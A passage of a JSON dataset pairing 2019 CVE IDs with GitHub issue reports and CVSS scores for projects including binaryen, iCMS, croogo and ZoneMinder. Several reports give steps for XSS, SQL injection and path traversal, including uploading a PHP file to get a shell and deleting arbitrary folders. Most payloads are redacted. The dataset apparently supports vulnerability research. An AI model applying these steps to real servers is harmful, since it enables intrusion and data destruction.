  43454. "description": "Null pointer Dereference in APITAG Hi, there. A Null pointer Dereference problem was discovered in APITAG A crafted wasm input can cause segmentation faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"wasm opt $POC\" to reproduce the problem. FILETAG git log: ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43455. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43456. "severity": "MEDIUM",
  43457. "baseScore": 6.5,
  43458. "impactScore": 3.6,
  43459. "exploitabilityScore": 2.8
  43460. },
  43461. {
  43462. "CVE_ID": "CVE-2019-7152",
  43463. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1880",
  43464. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1880",
  43465. "Repo_new": "webassembly/binaryen",
  43466. "Issue_Created_At": "2019-01-20T12:07:15Z",
  43467. "description": "A Heap buffer overflow problem was discovered in APITAG int). Hi, there. A Heap buffer overflow problem was discovered in APITAG int). A crafted wasm input can cause segmentation faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm opt $POC\" to reproduce the error. FILETAG git log: ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43468. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43469. "severity": "MEDIUM",
  43470. "baseScore": 6.5,
  43471. "impactScore": 3.6,
  43472. "exploitabilityScore": 2.8
  43473. },
  43474. {
  43475. "CVE_ID": "CVE-2019-7153",
  43476. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1879",
  43477. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1879",
  43478. "Repo_new": "webassembly/binaryen",
  43479. "Issue_Created_At": "2019-01-20T12:02:25Z",
  43480. "description": "Null pointer Dereference in APITAG int) in wasm/wasm APITAG Hi, there. A Null pointer Dereference problem was discovered in APITAG int) in wasm/wasm APITAG A crafted wasm input can cause segmentation faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"wasm opt $POC\" to reproduce the problem. FILETAG git log ERRORTAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43481. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43482. "severity": "MEDIUM",
  43483. "baseScore": 6.5,
  43484. "impactScore": 3.6,
  43485. "exploitabilityScore": 2.8
  43486. },
  43487. {
  43488. "CVE_ID": "CVE-2019-7154",
  43489. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/1876",
  43490. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/1876",
  43491. "Repo_new": "webassembly/binaryen",
  43492. "Issue_Created_At": "2019-01-19T07:42:40Z",
  43493. "description": "A Heap buffer overflow problem was discovered in APITAG function in simple_ast.h. Hi, there. A Heap buffer overflow problem was discovered in APITAG function in simple_ast.h in emscripten optimizer, as distributed in Binaryen NUMBERTAG A crafted wasm input can cause segmentation faults and I have confirmed them with address sanitizer too. Here are the POC files. Please use \"./wasm2js $POC\" to reproduce the error. FILETAG git log: CODETAG The ASAN dumps the stack trace as follows: ERRORTAG",
  43494. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43495. "severity": "MEDIUM",
  43496. "baseScore": 6.5,
  43497. "impactScore": 3.6,
  43498. "exploitabilityScore": 2.8
  43499. },
  43500. {
  43501. "CVE_ID": "CVE-2019-7156",
  43502. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/5",
  43503. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/5",
  43504. "Repo_new": "uvoteam/libdoc",
  43505. "Issue_Created_At": "2019-01-29T03:14:13Z",
  43506. "description": "division by zero in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a. A crafted input will lead to \u2019division by zero\u2018 in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a Triggered by APITAG Poc FILETAG The gdb information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  43507. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43508. "severity": "MEDIUM",
  43509. "baseScore": 6.5,
  43510. "impactScore": 3.6,
  43511. "exploitabilityScore": 2.8
  43512. },
  43513. {
  43514. "CVE_ID": "CVE-2019-7160",
  43515. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/50",
  43516. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/50",
  43517. "Repo_new": "idreamsoft/iCMS",
  43518. "Issue_Created_At": "2019-01-29T07:59:19Z",
  43519. "description": "iCMS NUMBERTAG unzip vulnerability GET SHELL. in FILETAG ERRORTAG and see the FILETAG ERRORTAG so we can use ../ to write a package file to any other folder on the server\u3002 first use this request to write a package file with a php file in it FILETAG FILETAG see FILETAG ERRORTAG and then use this request to unzip this package FILETAG so we can upload a php file FILETAG author by ji. EMAILTAG .cn",
  43520. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43521. "severity": "CRITICAL",
  43522. "baseScore": 9.8,
  43523. "impactScore": 5.9,
  43524. "exploitabilityScore": 3.9
  43525. },
  43526. {
  43527. "CVE_ID": "CVE-2019-7164",
  43528. "Issue_Url_old": "https://github.com/sqlalchemy/sqlalchemy/issues/4481",
  43529. "Issue_Url_new": "https://github.com/sqlalchemy/sqlalchemy/issues/4481",
  43530. "Repo_new": "sqlalchemy/sqlalchemy",
  43531. "Issue_Created_At": "2019-01-31T18:03:14Z",
  43532. "description": "sql injection via the order_by parameter. MENTIONTAG APITAG through NUMBERTAG and NUMBERTAG through NUMBERTAG b2 allows SQL Injection via the order_by parameter NUMBERTAG exp save the code locally: FILETAG exec code at shell terminal python dal.py APITAG python dal.py APITAG python dal.py 'create_time' the vulnerability happens in function order_by NUMBERTAG reserved by CVETAG",
  43533. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  43534. "severity": "CRITICAL",
  43535. "baseScore": 9.8,
  43536. "impactScore": 5.9,
  43537. "exploitabilityScore": 3.9
  43538. },
  43539. {
  43540. "CVE_ID": "CVE-2019-7168",
  43541. "Issue_Url_old": "https://github.com/croogo/croogo/issues/886",
  43542. "Issue_Url_new": "https://github.com/croogo/croogo/issues/886",
  43543. "Repo_new": "croogo/croogo",
  43544. "Issue_Created_At": "2019-01-16T11:58:30Z",
  43545. "description": "Stored XSS in APITAG field Content. Description There's no escape being done before printing out the value of Blog in the Content page. Croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Blog field value. Payload Introduction to ICT ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43546. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43547. "severity": "MEDIUM",
  43548. "baseScore": 4.8,
  43549. "impactScore": 2.7,
  43550. "exploitabilityScore": 1.7
  43551. },
  43552. {
  43553. "CVE_ID": "CVE-2019-7169",
  43554. "Issue_Url_old": "https://github.com/croogo/croogo/issues/888",
  43555. "Issue_Url_new": "https://github.com/croogo/croogo/issues/888",
  43556. "Repo_new": "croogo/croogo",
  43557. "Issue_Created_At": "2019-01-16T12:00:04Z",
  43558. "description": "Stored XSS in APITAG field Main Menu. Description There's no escape being done before printing out the value of Title in the Main Menu page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the value to the Title field. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43559. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43560. "severity": "MEDIUM",
  43561. "baseScore": 4.8,
  43562. "impactScore": 2.7,
  43563. "exploitabilityScore": 1.7
  43564. },
  43565. {
  43566. "CVE_ID": "CVE-2019-7170",
  43567. "Issue_Url_old": "https://github.com/croogo/croogo/issues/890",
  43568. "Issue_Url_new": "https://github.com/croogo/croogo/issues/890",
  43569. "Repo_new": "croogo/croogo",
  43570. "Issue_Created_At": "2019-01-16T12:01:39Z",
  43571. "description": "Stored XSS in APITAG field Vocabulary page. Description There's no escape being done before printing out the value of Title in the Vocabulary page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the values to the Title field. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43572. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43573. "severity": "MEDIUM",
  43574. "baseScore": 4.8,
  43575. "impactScore": 2.7,
  43576. "exploitabilityScore": 1.7
  43577. },
  43578. {
  43579. "CVE_ID": "CVE-2019-7171",
  43580. "Issue_Url_old": "https://github.com/croogo/croogo/issues/887",
  43581. "Issue_Url_new": "https://github.com/croogo/croogo/issues/887",
  43582. "Repo_new": "croogo/croogo",
  43583. "Issue_Created_At": "2019-01-16T11:59:19Z",
  43584. "description": "Stored XSS in APITAG field Blocks. Description There's no escape being done before printing out the value of Title in the Blocks page. croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the Title field value. Payload ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43585. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43586. "severity": "MEDIUM",
  43587. "baseScore": 4.8,
  43588. "impactScore": 2.7,
  43589. "exploitabilityScore": 1.7
  43590. },
  43591. {
  43592. "CVE_ID": "CVE-2019-7172",
  43593. "Issue_Url_old": "https://github.com/atutor/ATutor/issues/164",
  43594. "Issue_Url_new": "https://github.com/atutor/atutor/issues/164",
  43595. "Repo_new": "atutor/atutor",
  43596. "Issue_Created_At": "2019-01-16T11:55:48Z",
  43597. "description": "Stored XSS in APITAG Name\" field My Account. Description There's no escape being done before printing out the value of Real Name in the My Account page. APITAG version NUMBERTAG Steps to reproduce Navigate to FILETAG & add the below shared payload as the value to the Real Name field. Payload ERRORTAG Visit page FILETAG the payload will be triggered. FILETAG FILETAG",
  43598. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43599. "severity": "MEDIUM",
  43600. "baseScore": 6.1,
  43601. "impactScore": 2.7,
  43602. "exploitabilityScore": 2.8
  43603. },
  43604. {
  43605. "CVE_ID": "CVE-2019-7173",
  43606. "Issue_Url_old": "https://github.com/croogo/croogo/issues/889",
  43607. "Issue_Url_new": "https://github.com/croogo/croogo/issues/889",
  43608. "Repo_new": "croogo/croogo",
  43609. "Issue_Created_At": "2019-01-16T12:01:11Z",
  43610. "description": "Stored XSS in APITAG field Attachment page. Description There's no escape being done before printing out the value of Title in the Attachment page. Croogo version NUMBERTAG Steps to reproduce Navigate to URLTAG & add the below shared payload as the value to the Title field. Payload webappumldeploy ERRORTAG Visit page URLTAG the payload will be triggered. FILETAG FILETAG",
  43611. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  43612. "severity": "MEDIUM",
  43613. "baseScore": 4.8,
  43614. "impactScore": 2.7,
  43615. "exploitabilityScore": 1.7
  43616. },
  43617. {
  43618. "CVE_ID": "CVE-2019-7175",
  43619. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1450",
  43620. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1450",
  43621. "Repo_new": "imagemagick/imagemagick",
  43622. "Issue_Created_At": "2019-01-17T02:37:57Z",
  43623. "description": "memory leak in APITAG in coders/pcd.c different from NUMBERTAG and NUMBERTAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG memory leak in APITAG in coders/pcd.c, which is different from NUMBERTAG and NUMBERTAG Steps to Reproduce APITAG columns NUMBERTAG i++) { APITAG length=(sum NUMBERTAG ff NUMBERTAG APITAG ) APITAG //line NUMBERTAG sizeof( pcd_table[i])); if (pcd_table[i] == APITAG ) NULL) //line NUMBERTAG buffer=(unsigned char ) APITAG ERRORTAG //line NUMBERTAG image >filename); } r=pcd_table[i]; for (j NUMBERTAG j APITAG length=(unsigned int) (sum NUMBERTAG ff NUMBERTAG if (r >length NUMBERTAG line NUMBERTAG buffer=(unsigned char ) APITAG APITAG //line NUMBERTAG APITAG r >sequence=(unsigned int) (sum NUMBERTAG ffff) APITAG key=(unsigned char) (sum NUMBERTAG ff); r >mask NUMBERTAG U NUMBERTAG r >length NUMBERTAG r++; } pcd_length[i]=(size_t) length; } ERRORTAG c if (pcd_table[i] == APITAG ) NULL) //line NUMBERTAG buffer=(unsigned char ) APITAG for (k NUMBERTAG k APITAG filename); } if (r >length NUMBERTAG buffer=(unsigned char ) APITAG for (k NUMBERTAG k APITAG APITAG version: APITAG APITAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG Additional information: APITAG Credit to Bingchang Liu at VARAS of IIE",
  43624. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  43625. "severity": "HIGH",
  43626. "baseScore": 7.5,
  43627. "impactScore": 3.6,
  43628. "exploitabilityScore": 3.9
  43629. },
  43630. {
  43631. "CVE_ID": "CVE-2019-7233",
  43632. "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/6",
  43633. "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/6",
  43634. "Repo_new": "uvoteam/libdoc",
  43635. "Issue_Created_At": "2019-01-30T01:57:15Z",
43636. "description": "Segmentation fault in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a. A parameter which does not exist will lead to a segmentation fault in APITAG at libdoc master branch( PATHTAG ) when using libdoc.a. Triggered by APITAG PoC: ./doc2txt APITAG The ASAN information is as follows: ERRORTAG APITAG wu.an. EMAILTAG",
  43637. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  43638. "severity": "HIGH",
  43639. "baseScore": 8.8,
  43640. "impactScore": 5.9,
  43641. "exploitabilityScore": 2.8
  43642. },
  43643. {
  43644. "CVE_ID": "CVE-2019-7235",
  43645. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/52",
  43646. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/52",
  43647. "Repo_new": "idreamsoft/iCMS",
  43648. "Issue_Created_At": "2019-01-30T06:40:33Z",
43649. "description": "iCMS NUMBERTAG can delete any folder. First use URLTAG to change the parameter _app to /../ ; for example, we create a folder named test and change _app to /../test FILETAG FILETAG in PATHTAG ERRORTAG in PATHTAG ERRORTAG and when we request URLTAG to uninstall this app, $appdir is PATHTAG and we can delete the test folder FILETAG FILETAG now test is deleted FILETAG If we use ../ to change the parameter _app, we can delete any folder (the _app value is used to build the uninstall path without being checked for ../). author by ji. EMAILTAG .cn",
  43650. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  43651. "severity": "HIGH",
  43652. "baseScore": 7.5,
  43653. "impactScore": 3.6,
  43654. "exploitabilityScore": 3.9
  43655. },
  43656. {
  43657. "CVE_ID": "CVE-2019-7236",
  43658. "Issue_Url_old": "https://github.com/idreamsoft/iCMS/issues/53",
  43659. "Issue_Url_new": "https://github.com/idreamsoft/icms/issues/53",
  43660. "Repo_new": "idreamsoft/iCMS",
  43661. "Issue_Created_At": "2019-01-30T07:16:00Z",
43662. "description": "iCMS NUMBERTAG Directory Traversal. in PATHTAG ERRORTAG in PATHTAG ERRORTAG FILETAG change dir to ../ FILETAG we can traverse any folder on the server FILETAG author by ji. EMAILTAG .cn",
  43663. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  43664. "severity": "HIGH",
  43665. "baseScore": 7.5,
  43666. "impactScore": 3.6,
  43667. "exploitabilityScore": 3.9
  43668. },
  43669. {
  43670. "CVE_ID": "CVE-2019-7250",
  43671. "Issue_Url_old": "https://github.com/davidrthorn/cross_reference/issues/32",
  43672. "Issue_Url_new": "https://github.com/davidrthorn/cross_reference/issues/32",
  43673. "Repo_new": "davidrthorn/cross_reference",
  43674. "Issue_Created_At": "2019-01-30T16:04:38Z",
43675. "description": "Stored XSS vulnerability in preview boxes via label and references text. Overall description A stored XSS vulnerability in the preview boxes in the configuration panel may allow a malicious user to use both label text and references text to inject arbitrary javascript code (via script tags, event handlers, etc.). Since the code is stored by the plugin, the attacker may be able to target anyone who opens the configuration panel of the plugin. Steps to reproduce NUMBERTAG Create a new document with the plugin enabled NUMBERTAG Either leave the current category selected, or create a new one NUMBERTAG In either the label text box or the references text box (or both if you prefer) insert one of the following codes: APITAG ERRORTAG NUMBERTAG Press APITAG and apply NUMBERTAG Now, when the victim opens the configuration panel and selects the category of the step NUMBERTAG a popup will appear. Categories are shown in alphabetical order, so if the chosen one in step NUMBERTAG is the first to be shown, the victim does not even need to select it to be affected. Please note that the examples proposed are only for demonstration. An attacker may inject arbitrary harmful javascript code. Resolution You need to HTML-escape the label and references text before rendering it in the preview box in the configuration panel. Additional information A CVE ID request has been submitted. The issue will be updated with the actual number asap.",
  43676. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43677. "severity": "MEDIUM",
  43678. "baseScore": 6.1,
  43679. "impactScore": 2.7,
  43680. "exploitabilityScore": 2.8
  43681. },
  43682. {
  43683. "CVE_ID": "CVE-2019-7295",
  43684. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2129",
  43685. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2129",
  43686. "Repo_new": "typora/typora-issues",
  43687. "Issue_Created_At": "2019-01-25T16:06:05Z",
43688. "description": "An XSS with resultant remote command execution when Typora renders a mathematical formula. When a document with the following content is opened, it executes commands. version NUMBERTAG APITAG ERRORTAG version NUMBERTAG ERRORTAG The Linux and Mac versions are also affected.",
  43689. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43690. "severity": "MEDIUM",
  43691. "baseScore": 6.1,
  43692. "impactScore": 2.7,
  43693. "exploitabilityScore": 2.8
  43694. },
  43695. {
  43696. "CVE_ID": "CVE-2019-7296",
  43697. "Issue_Url_old": "https://github.com/typora/typora-issues/issues/2131",
  43698. "Issue_Url_new": "https://github.com/typora/typora-issues/issues/2131",
  43699. "Repo_new": "typora/typora-issues",
  43700. "Issue_Created_At": "2019-01-26T09:10:47Z",
43701. "description": "XSS vulnerability when rendering a mathematical formula inline. The new version APITAG only fixed the vulnerability when rendering a mathematical formula in a block. However, inline rendering has the same problem, so the new PoC: $ APITAG APITAG APITAG $",
  43702. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43703. "severity": "MEDIUM",
  43704. "baseScore": 6.1,
  43705. "impactScore": 2.7,
  43706. "exploitabilityScore": 2.8
  43707. },
  43708. {
  43709. "CVE_ID": "CVE-2019-7317",
  43710. "Issue_Url_old": "https://github.com/glennrp/libpng/issues/275",
  43711. "Issue_Url_new": "https://github.com/glennrp/libpng/issues/275",
  43712. "Repo_new": "glennrp/libpng",
  43713. "Issue_Created_At": "2019-01-26T00:53:09Z",
43714. "description": "Use after free . We ran some tests on an older version of libpng and found a use after free bug while running one of the test cases. It looks like the bug is still there in the latest code. Here's the output from our tool DTS_MSG: Stensal DTS detected a fatal program error! DTS_MSG: Continuing the execution will cause unexpected behaviors, abort! DTS_MSG: Access the memory block that is freed. DTS_MSG: Diagnostic information: APITAG Caution: the allocation info is correct only if the freed memory is not reused. the memory block (start NUMBERTAG ffb NUMBERTAG c, size NUMBERTAG bytes) was allocated at PATHTAG NUMBERTAG Stack trace (most recent call first NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG PATHTAG NUMBERTAG DTS_MSG: [PRO] This detection can be configured with APITAG DTS_MSG: [PRO] but it's not recommended to change to warning or disabled. Basically, APITAG calls png_safe_execute(image, png_image_free_function, image). In png_safe_execute you have the following code: ERRORTAG When result is NUMBERTAG, image is freed, but then image >opaque >error_buf is assigned directly after, i.e. a write through the freed pointer.",
  43715. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:H",
  43716. "severity": "MEDIUM",
  43717. "baseScore": 5.3,
  43718. "impactScore": 3.6,
  43719. "exploitabilityScore": 1.6
  43720. },
  43721. {
  43722. "CVE_ID": "CVE-2019-7325",
  43723. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2450",
  43724. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2450",
  43725. "Repo_new": "zoneminder/zoneminder",
  43726. "Issue_Created_At": "2019-01-24T19:31:01Z",
43727. "description": "Reflected Cross Site Scripting (XSS) Multiple ($_SERVER['PHP_SELF NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug There exists XSS in multiple views as they insecurely utilize APITAG , that is without applying any proper filtration. All the view files available under PATHTAG are vulnerable, except the few listed below. PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG PATHTAG To Reproduce Affected URL : URLTAG APITAG Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43728. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43729. "severity": "MEDIUM",
  43730. "baseScore": 6.1,
  43731. "impactScore": 2.7,
  43732. "exploitabilityScore": 2.8
  43733. },
  43734. {
  43735. "CVE_ID": "CVE-2019-7326",
  43736. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2452",
  43737. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2452",
  43738. "Repo_new": "zoneminder/zoneminder",
  43739. "Issue_Created_At": "2019-01-24T19:44:53Z",
  43740. "description": "Self Stored Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view console , insecurely prints the Host value on the webpage, without applying any proper filtration, leading to Self stored XSS. To Reproduce Affected URL : URLTAG Payload used ERRORTAG Navigate to the URLTAG Inject the XSS payload into the Host Name field. Navigate to the affected URL, payload will be triggered APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43741. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43742. "severity": "MEDIUM",
  43743. "baseScore": 6.1,
  43744. "impactScore": 2.7,
  43745. "exploitabilityScore": 2.8
  43746. },
  43747. {
  43748. "CVE_ID": "CVE-2019-7327",
  43749. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2447",
  43750. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2447",
  43751. "Repo_new": "zoneminder/zoneminder",
  43752. "Issue_Created_At": "2019-01-24T19:18:03Z",
  43753. "description": "Reflected Cross Site Scripting(XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the scale parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43754. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43755. "severity": "MEDIUM",
  43756. "baseScore": 6.1,
  43757. "impactScore": 2.7,
  43758. "exploitabilityScore": 2.8
  43759. },
  43760. {
  43761. "CVE_ID": "CVE-2019-7329",
  43762. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2446",
  43763. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2446",
  43764. "Repo_new": "zoneminder/zoneminder",
  43765. "Issue_Created_At": "2019-01-24T19:14:11Z",
43766. "description": "Reflected Cross Site Scripting (XSS) Multiple ($_SERVER['PHP_SELF']). Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The form action on multiple views utilizes APITAG insecurely. Any arbitrary input appended to the webroot URL, without any proper filtration, would lead to a reflected XSS. To Reproduce Affected URL : FILETAG \"> APITAG ?view=monitor Payload used ERRORTAG Navigate to the Affected URL, Payload would be triggered. Expected behavior Proper escaping of special characters. Debug Logs None",
  43767. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43768. "severity": "MEDIUM",
  43769. "baseScore": 6.1,
  43770. "impactScore": 2.7,
  43771. "exploitabilityScore": 2.8
  43772. },
  43773. {
  43774. "CVE_ID": "CVE-2019-7330",
  43775. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2448",
  43776. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2448",
  43777. "Repo_new": "zoneminder/zoneminder",
  43778. "Issue_Created_At": "2019-01-24T19:22:37Z",
  43779. "description": "Reflected Cross Site Scripting(XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view frame , insecurely prints the show parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG APITAG Payload used ERRORTAG Navigate to the Affected URL(with valid fid,eid), Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43780. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43781. "severity": "MEDIUM",
  43782. "baseScore": 6.1,
  43783. "impactScore": 2.7,
  43784. "exploitabilityScore": 2.8
  43785. },
  43786. {
  43787. "CVE_ID": "CVE-2019-7332",
  43788. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2442",
  43789. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2442",
  43790. "Repo_new": "zoneminder/zoneminder",
  43791. "Issue_Created_At": "2019-01-24T17:17:24Z",
  43792. "description": "Reflected Cross Site Scripting (XSS) FILETAG NUMBERTAG Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view download , while exporting an event file, prints the eid APITAG ID) on the webpage without applying any proper filtration, leading to an XSS issue. To Reproduce Affected URL : URLTAG APITAG Payload used APITAG Navigate to the Affected URL, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43793. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43794. "severity": "MEDIUM",
  43795. "baseScore": 6.1,
  43796. "impactScore": 2.7,
  43797. "exploitabilityScore": 2.8
  43798. },
  43799. {
  43800. "CVE_ID": "CVE-2019-7333",
  43801. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2441",
  43802. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2441",
  43803. "Repo_new": "zoneminder/zoneminder",
  43804. "Issue_Created_At": "2019-01-24T17:06:53Z",
  43805. "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view download , while exporting an event file, prints the Exportfile parameter value on the webpage without applying any proper filtration, leading to reflected XSS. To Reproduce Affected URL : URLTAG {injectionpoint}$&generated NUMBERTAG Payload used APITAG Navigate to the Affected URL Click on Download, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43806. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43807. "severity": "MEDIUM",
  43808. "baseScore": 6.1,
  43809. "impactScore": 2.7,
  43810. "exploitabilityScore": 2.8
  43811. },
  43812. {
  43813. "CVE_ID": "CVE-2019-7334",
  43814. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2443",
  43815. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2443",
  43816. "Repo_new": "zoneminder/zoneminder",
  43817. "Issue_Created_At": "2019-01-24T18:42:31Z",
  43818. "description": "Reflected Cross Site Scripting (XSS) FILETAG . Describe Your Environment APITAG NUMBERTAG Installed from ppa:iconnor/zoneminder master Describe the bug The view export , while exporting an event file, prints the Exportfile name of the webpage without applying any proper filtration, leading to an XSS issue To Reproduce Affected URL : URLTAG {injectionpoint}$&generated NUMBERTAG Payload used APITAG Navigate to the Affected URL Click on Download, Payload would be triggered. APITAG Expected behavior Proper escaping of special characters. Debug Logs None",
  43819. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  43820. "severity": "MEDIUM",
  43821. "baseScore": 6.1,
  43822. "impactScore": 2.7,
  43823. "exploitabilityScore": 2.8
  43824. },
  43825. {
  43826. "CVE_ID": "CVE-2019-7335",
  43827. "Issue_Url_old": "https://github.com/ZoneMinder/zoneminder/issues/2453",
  43828. "Issue_Url_new": "https://github.com/zoneminder/zoneminder/issues/2453",
  43829. "Repo_new": "zoneminder/zoneminder",
  43830. "Issue_Created_At": "2019-01-24T19:52:38Z",
